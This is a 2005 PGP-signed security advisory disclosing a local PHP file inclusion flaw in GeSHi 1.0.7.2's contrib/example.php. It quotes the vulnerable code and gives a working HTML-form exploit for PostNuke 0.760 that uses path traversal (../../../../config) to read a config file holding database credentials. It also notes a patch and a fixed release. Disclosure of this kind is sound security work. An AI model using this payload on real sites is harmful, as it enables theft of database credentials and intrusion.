GeSHi Local PHP file inclusion 1.0.7.2 ( Research Advisory )

Advisory Text :

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[GeSHi Local PHP file inclusion 1.0.7.2]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
Date: 21.9.2005
from SECURITYREASON.COM

- --- 0.Description ---

GeSHi started as a mod for the phpBB forum system, to enable highlighting
of more languages than the available (which was 0 ;)). However, it quickly
spawned into an entire project on its own. But now it has been released,
work continues on a mod for phpBB - and hopefully for many forum systems,
blogs and other web-based systems.

Several systems are using GeSHi now, including:

PostNuke - A popular open source CMS
Docuwiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evovling CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool

- --- 1. Local (PHP) file inclusion ---
I have found one bug in file ./contrib/example.php
This file exists in standart packet GeSHi.
In file:

- -10-18-line---
include('../geshi.php');
if ( isset($_POST['submit']) )
{
if ( get_magic_quotes_gpc() ) $_POST['source'] =
stripslashes($_POST['source']);
if ( !strlen(trim($_POST['source'])) )
{
$_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] .
'.php'));
$_POST['language'] = 'php';
}
- -10-18-line---

Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you
can read any php file
(for example in postnuke -config.php-).
You need use varible $_POST['language'] wher is path to php file.
I have tested this bug in GeSHi package and in PostNuke 0.760.

PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)

We can read config.php in PostNuke where we have login, password, dbname
and dbhost.
All variables needed to log in to database.
So we can just use this exploit below :

- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---
<center><a href="http://securityreason.com"
target="http://securityreason.com/"><img
src="http://securityreason.com/gfx/small_logo.png"></a><p>
<form
action="http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php"
method="post">
Path to file:<br>
example: <b>../../../../config</b><br>
<textarea name="language"></textarea><br>
<input type="submit" name="submit" value="See">
</form>
- --- EXPLOIT FOR POSTNUKE 0.760 ---

[HOST] = example. http://www.securityreason.com/postnuke/html
any questions? ;]

- --- 2. How to fix ---
Patch
http://securityreason.com/patch/2
works in PostNuke 0.760

or new version of script 1.0.7.3

- --- 3. Greets ---

sp3x

- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm
MWVTap2Adcne2IMt7OpZHmM=
=JulS
-----END PGP SIGNATURE-----

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason